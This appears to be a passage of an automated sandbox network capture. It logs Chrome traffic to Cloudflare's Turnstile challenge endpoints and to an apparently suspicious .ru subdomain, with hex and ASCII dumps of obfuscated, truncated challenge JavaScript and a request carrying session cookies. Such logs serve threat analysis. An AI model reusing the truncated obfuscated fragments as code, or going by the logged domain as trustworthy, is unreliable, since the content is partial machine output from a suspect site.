                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 75 72 6e 20 6f 26 6e 7d 2c 27 4e 43 4a 75 64 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 6c 57 4e 64 4e 27 3a 67 4e 28 34 32 35 29 2c 27 46 73 7a 6e 73 27 3a 67 4e 28 37 35 39 29 2c 27 41 6e 71 6c 51 27 3a 67 4e 28 31 32 36 34 29 2c 27 47 47 4b 48 56 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 7b 69 66 28 66 3d 64 5b 67 4e 28 31 36 30 30 29 5d 2c 64 5b 67 4e 28 31 32 32 36 29 5d 26 26 74 79 70 65 6f 66 20 64 5b 67 4e 28 31 32 32 36 29 5d 3d 3d 3d 67 4e 28 34 33 30 29 29 7b 69 66 28 65 5b 67 4e 28 31 30 35 33 29 5d 28 65 5b 67 4e 28 31 30 31 33 29 5d 2c 65 5b 67 4e 28 38 34 34 29 5d 29 29 72 65
                                                                                                                              Data Ascii: urn o&n},'NCJud':function(n,o){return o===n},'lWNdN':gN(425),'Fszns':gN(759),'AnqlQ':gN(1264),'GGKHV':function(n,o,s){return n(o,s)}},d instanceof Error){if(f=d[gN(1600)],d[gN(1226)]&&typeof d[gN(1226)]===gN(430)){if(e[gN(1053)](e[gN(1013)],e[gN(844)]))re
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 37 39 29 29 7d 2c 31 30 29 2c 65 4d 5b 67 50 28 37 34 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 53 2c 73 2c 76 2c 78 29 7b 28 67 53 3d 67 50 2c 69 5b 67 53 28 31 34 32 34 29 5d 21 3d 3d 67 53 28 31 34 36 33 29 29 3f 28 6d 3d 6e 5b 67 53 28 31 36 30 30 29 5d 2c 6f 5b 67 53 28 31 32 32 36 29 5d 26 26 69 5b 67 53 28 31 33 30 31 29 5d 28 74 79 70 65 6f 66 20 73 5b 67 53 28 31 32 32 36 29 5d 2c 69 5b 67 53 28 39 33 38 29 5d 29 29 26 26 28 73 3d 46 5b 67 53 28 31 32 32 36 29 5d 5b 67 53 28 33 39 38 29 5d 28 27 5c 6e 27 29 2c 73 5b 67 53 28 31 35 32 32 29 5d 3e 31 29 26 26 28 76 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 78 3d 73 5b 31 5d 5b 67 53 28 31 36 35 37 29 5d 28 76 29 2c 78 26 26 28 51 3d 78 5b 31 5d 2c 52 3d
                                                                                                                              Data Ascii: 79))},10),eM[gP(742)](function(gS,s,v,x){(gS=gP,i[gS(1424)]!==gS(1463))?(m=n[gS(1600)],o[gS(1226)]&&i[gS(1301)](typeof s[gS(1226)],i[gS(938)]))&&(s=F[gS(1226)][gS(398)]('\n'),s[gS(1522)]>1)&&(v=/^\s*at\s+(.+):(\d+):(\d+)/,x=s[1][gS(1657)](v),x&&(Q=x[1],R=
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 21 65 4d 5b 69 65 28 31 32 37 34 29 5d 26 26 21 63 5b 69 65 28 38 32 37 29 5d 28 66 75 29 26 26 21 65 4d 5b 69 65 28 39 37 37 29 5d 5b 69 65 28 31 34 38 38 29 5d 26 26 63 5b 69 65 28 34 35 31 29 5d 28 63 5b 69 65 28 31 30 32 31 29 5d 28 65 2c 66 4f 29 2c 64 29 29 7b 69 66 28 63 5b 69 65 28 33 32 32 29 5d 21 3d 3d 69 65 28 31 33 37 31 29 29 63 5b 69 65 28 38 32 37 29 5d 28 66 61 29 3b 65 6c 73 65 7b 69 66 28 67 3d 7b 27 42 44 61 6c 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 7d 2c 66 28 29 29 72 65 74 75 72 6e 3b 63 5b 69 65 28 31 36 32 37 29 5d 28 67 2c 69 65 28 31 34 35 33 29 2c 66 75 6e 63 74 69 6f 6e 28 6b 2c 69 67 29 7b 69 67 3d 69 65 2c 6b 5b 69 67 28 36 32 31 29 5d 3d 67 5b 69 67 28 36 36 35 29 5d 28 69 2c
                                                                                                                              Data Ascii: !eM[ie(1274)]&&!c[ie(827)](fu)&&!eM[ie(977)][ie(1488)]&&c[ie(451)](c[ie(1021)](e,fO),d)){if(c[ie(322)]!==ie(1371))c[ie(827)](fa);else{if(g={'BDalk':function(h,i){return h(i)}},f())return;c[ie(1627)](g,ie(1453),function(k,ig){ig=ie,k[ig(621)]=g[ig(665)](i,
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 57 66 54 27 3a 6a 66 28 37 32 36 29 2c 27 73 54 6d 4c 65 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 66 65 76 4d 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 6d 50 56 61 63 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 61 64 5a 64 51 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 76 64 76 79 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 65 50 61 70 69 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 68 3d 3d 3d 6e 75 6c 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 29 72 65 74 75 72 6e
                                                                                                                              Data Ascii: WfT':jf(726),'sTmLe':function(G,H){return G<H},'fevMK':function(G,H){return H===G},'mPVac':function(G,H){return G+H},'adZdQ':function(G,H){return G(H)},'vdvyl':function(G,H){return G===H},'ePapi':function(G,H,I){return G(H,I)}},h===null||void 0===h)return
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 2c 27 66 27 3d 3d 3d 6e 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6f 3c 69 5b 6c 5b 6d 5d 5d 5b 6a 69 28 31 35 32 32 29 5d 3b 6b 5b 6a 69 28 39 39 39 29 5d 28 2d 31 2c 68 5b 6e 5d 5b 6a 69 28 33 31 36 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 26 26 28 67 63 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 6a 69 28 34 33 31 29 5d 28 27 6f 2e 27 2b 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 6a 69 28 31 36 38 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 67 64 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 6a 6a 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 6a 6a 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 6a
                                                                                                                              Data Ascii: ,'f'===n&&(n='N'),h[n]){for(o=0;o<i[l[m]][ji(1522)];k[ji(999)](-1,h[n][ji(316)](i[l[m]][o]))&&(gc(i[l[m]][o])||h[n][ji(431)]('o.'+i[l[m]][o])),o++);}else h[n]=i[l[m]][ji(1681)](function(s){return'o.'+s})},gd=function(f,jj,g,h,i,j,k,l,m){for(jj=gJ,g={},g[j
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 62 66 6e 54 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 46 4e 52 69 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 44 65 4e 41 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 71 74 76 4a 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 77 69 4d 76 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 73 4d 46 4e 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4b 50 57 71 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c
                                                                                                                              Data Ascii: ){return h|i},'bfnTR':function(h,i){return h-i},'FNRiT':function(h,i){return h-i},'DeNAb':function(h,i){return h(i)},'qtvJk':function(h,i){return h|i},'wiMvh':function(h,i){return h==i},'sMFNN':function(h,i){return h<i},'KPWqF':function(h,i){return h==i},


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.449759104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:05 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:05 UTC240INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:05 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78e4098141bd-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.449746172.67.164.1644433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:06 UTC1314OUTGET /favicon.ico HTTP/1.1
                                                                                                                              Host: h6n.xswpbsmx.ru
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/9dCP/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IkNEZVg2aXVlRE03K1ZlZ2l4V2hzWEE9PSIsInZhbHVlIjoiUDNOb0Fya1kwNjdVV0xqZHNrUmFuMUY4RTAxM09id0pRZ2ZJS0NBRmJVN3dxYTQzQ2c1Y0YrZUdlRzNSWHhYZ01TNVYyZ1hWUjYvSDY5bkh6WVdpazhNRVcrYkRpckUvOWdFY3FiWU1rcGtlSG5mMG9qZmdyN1BScFVVTkxXNmUiLCJtYWMiOiI1MDY2MDUwMmNlNjQxNzRkYjk5MjU5ZTcxNmYwODY0MjBkNTdiZDkyZmMzMTE5OGIxZjZiYTYyYmUxMWU3YjZhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxpYWV1eEdrM2QwVDJ4MGVhczgwWkE9PSIsInZhbHVlIjoiQityVU4ySkpoTHJQNmkrS1Uvb1pHd09yN2JjaGlvRmxreVkrYUVMQ0dQR3RzTTE3Z0oyNjdEWlQ2aUMzMmdUcWZYNms5ZXFzdGQwczJrL1hGdnpQanZrTmVDQVNDSGZBM1lVbTh4VHlIMVBCOTFXektQaXhFQ3FQdExXdEpRUFYiLCJtYWMiOiIwYTg2ZmQ2Mjc3NWRhOTcyYmY0Y2MyMzlhMjMxY2QzZmFlNjhiYTMwMmE2NTczYmYwYmIzMTBiODI2YzkwZTJjIiwidGFnIjoiIn0%3D
                                                                                                                              2024-12-04 20:16:06 UTC1055INHTTP/1.1 404 Not Found
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:06 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=14400
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6A7Qg2px6KUksXvNOjWYClXGu2aZaEH9QCjBy1XqFlPrbT2IBv5zpIVyHR8b0tuPBpOYnVpgEJ1aqDscypHjmeTtQN6H%2B50RyD%2Bcbw1Sb6SvvIvqiG3OYIf5zKk5Yg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1658&rtt_var=483&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2227&delivery_rate=2362149&cwnd=242&unsent_bytes=0&cid=cade9088320ad040&ts=38&x=0"
                                                                                                                              CF-Cache-Status: MISS
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78e99842425d-EWR
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1614&rtt_var=619&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1892&delivery_rate=1746411&cwnd=193&unsent_bytes=0&cid=fed9671ebd13e65c&ts=9664&x=0"
                                                                                                                              2024-12-04 20:16:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.449763104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:07 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:07 UTC240INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:07 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78ef6bf10f8b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.449764104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:07 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ece78d77fea8c95&lang=auto HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:08 UTC331INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:08 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 110210
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78f2790ff799-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:08 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 45 73 73 58 42 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a
                                                                                                                              Data Ascii: eferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_footer_terms":"Terms","invalid_sitekey":
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 2c 67 38 2c 67 69 2c 67 74 2c 67 78 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 5a 2c 66 30 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 35 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 38 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 34 33 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 30 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 39 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 38 31 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 37 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 32
                                                                                                                              Data Ascii: ,g8,gi,gt,gx,gB,gC,gG,gH,eZ,f0){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(565))/1+parseInt(gI(598))/2*(-parseInt(gI(543))/3)+-parseInt(gI(1240))/4+-parseInt(gI(709))/5*(parseInt(gI(581))/6)+parseInt(gI(567))/7+-parseInt(gI(62
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 75 63 5a 64 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 79 45 77 67 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 64 4a 61 6d 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6c 57 54 41 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 75 61 4c 50 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 61 77 68 48 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 6b 76 78 49 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                                                                              Data Ascii: ction(h,i){return i|h},'ucZdh':function(h,i){return h<<i},'yEwgl':function(h,i){return i&h},'dJamf':function(h,i){return h==i},'lWTAY':function(h,i){return h==i},'uaLPJ':function(h,i){return i&h},'awhHi':function(h,i){return i===h},'kvxIB':function(h,i){r
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 63 74 5b 68 68 28 36 38 33 29 5d 5b 68 68 28 35 39 34 29 5d 5b 68 68 28 31 32 30 35 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 46 2b 4e 2c 4f 62 6a 65 63 74 5b 68 68 28 36 38 33 29 5d 5b 68 68 28 35 39 34 29 5d 5b 68 68 28 31 32 30 35 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 20 69 66 28 68 68 28 36 34 34 29 3d 3d 3d 68 68 28 36 34 34 29 29 7b 66 6f 72 28 50 3d 64 5b 68 68 28 36 31 34 29 5d 5b 68 68 28 31 32 33 32 29 5d 28 27 7c 27 29 2c 51 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 50 5b 51 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 44 5b 4f 5d 3d 48 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 69 66 28 4f 62 6a 65 63 74 5b 68 68 28 36 38 33 29 5d 5b 68 68 28 35 39 34 29 5d 5b 68 68
                                                                                                                              Data Ascii: ct[hh(683)][hh(594)][hh(1205)](D,N)||(D[N]=H++,E[N]=!0),O=F+N,Object[hh(683)][hh(594)][hh(1205)](D,O))F=O;else if(hh(644)===hh(644)){for(P=d[hh(614)][hh(1232)]('|'),Q=0;!![];){switch(P[Q++]){case'0':D[O]=H++;continue;case'1':if(Object[hh(683)][hh(594)][hh
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 64 5b 68 68 28 38 30 31 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 68 68 28 31 31 30 38 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 52 3d 46 5b 68 68 28 31 34 32 39 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 64 5b 68 68 28 35 34 30 29 5d 28 4b 3c 3c 31 2c 52 26 31 29 2c 64 5b 68 68 28 31 34 30 35 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 68 68 28 31 31 30 38 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 52 3d 31 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 68 68 28 37 35 33 29 5d 28 4b 3c 3c 31 2c 52 29 2c 4c 3d 3d 64 5b 68 68 28 37 38 39 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 68 68 28
                                                                                                                              Data Ascii: )](C,I);K<<=1,d[hh(801)](L,o-1)?(L=0,J[hh(1108)](s(K)),K=0):L++,C++);for(R=F[hh(1429)](0),C=0;8>C;K=d[hh(540)](K<<1,R&1),d[hh(1405)](L,o-1)?(L=0,J[hh(1108)](s(K)),K=0):L++,R>>=1,C++);}else{for(R=1,C=0;C<I;K=d[hh(753)](K<<1,R),L==d[hh(789)](o,1)?(L=0,J[hh(
